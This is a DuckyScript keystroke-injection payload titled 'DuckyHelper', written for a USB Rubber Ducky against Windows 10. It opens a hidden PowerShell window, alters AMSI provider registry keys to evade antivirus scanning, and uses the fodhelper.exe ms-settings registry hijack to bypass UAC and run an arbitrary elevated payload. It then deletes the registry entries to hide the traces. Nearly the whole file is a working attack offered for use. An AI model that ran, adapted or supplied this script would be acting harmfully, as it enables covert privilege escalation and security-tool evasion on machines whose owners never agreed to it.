48 lines
1.6 KiB
Plaintext
48 lines
1.6 KiB
Plaintext
REM DuckyHelper
|
|
REM Version 1.0
|
|
REM OS: Windows 10
|
|
REM Author: 0i41E
|
|
|
|
REM UAC bypass for privilege escalation (Method FodHelper)
|
|
REM AV will notify, but payload will still be executed
|
|
REM Payload configured in line 19 & 21 (cmd.exe) : $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse;[PAYLOAD]
|
|
|
|
DELAY 1500
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell -NoP -NonI -WindowStyle hidden -Exec Bypass
|
|
DELAY 250
|
|
ENTER
|
|
|
|
DELAY 200
|
|
STRING $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Fo
|
|
DELAY 100
|
|
STRING rce; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; cmd.e
|
|
DELAY 100
|
|
STRING xe";Start-Sleep 1;New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force;;New-ItemProperty -Path "HKC
|
|
DELAY 100
|
|
STRING U:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Set-ItemProperty -Path "H
|
|
DELAY 100
|
|
STRING KCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $P -Force;Start-Process "C:\Windows\Sys
|
|
DELAY 100
|
|
STRING tem32\fodhelper.exe" -WindowStyle Hidden;Start-Sleep 3
|
|
DELAY 100
|
|
ENTER
|
|
|
|
DELAY 5000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell -NoP -NonI -Exec Bypass
|
|
DELAY 250
|
|
ENTER
|
|
|
|
DELAY 200
|
|
STRING Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
|
|
DELAY 100
|
|
ENTER
|
|
|
|
DELAY 300
|
|
STRING exit
|
|
DELAY 100
|
|
ENTER
|